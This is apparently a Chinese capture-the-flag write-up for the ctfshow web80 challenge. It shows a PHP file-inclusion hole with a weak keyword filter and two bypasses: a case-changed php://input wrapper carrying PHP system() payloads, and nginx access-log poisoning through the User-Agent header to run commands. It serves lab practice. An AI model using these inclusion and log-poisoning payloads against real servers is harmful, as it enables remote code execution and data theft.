[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
用户479492835691520 分钟前
6w star,GitHub 趋势第一的 Ponytail,这个agent插件到底在火什么
前端·后端
薛定喵的谔2 小时前
我开源了一个精致的 Next.js 博客模板:Skyplume
前端·前端框架·next.js
张龙6872 小时前
构建生产级 AI Agent:工具调用与记忆架构实战指南
前端
kyriewen3 小时前
2026 年了,还在用 Node.js?Bun 迁移实战:20 分钟搞定,附踩坑记录
前端·javascript·node.js
青山Coding5 小时前
Cesium应用(八):物体运动的实现思路
前端·cesium
用户41659673693555 小时前
Android WebView 加载 file:// 离线页面调试教程
android·前端
Asmewill5 小时前
curl命令学习笔记一
前端
我是一只快乐的小螃蟹5 小时前
1.2 ArrayList 源码解析
前端
星栈5 小时前
我用 Rust + Dioxus 做了个全栈跨平台笔记应用:再把新建、编辑和交付补上
前端·rust·前端框架
我是一只快乐的小螃蟹5 小时前
1.1 HashMap (JDK1.8) 源码解析
前端
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04飞书长连接_事件订阅(接收消息,审批任务状态变更)05Trae国际版与国内版深度测评:AI原生IDE的双生花06GitHub 镜像站点07【AI】2026 年具身智能模型和世界模型总结08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?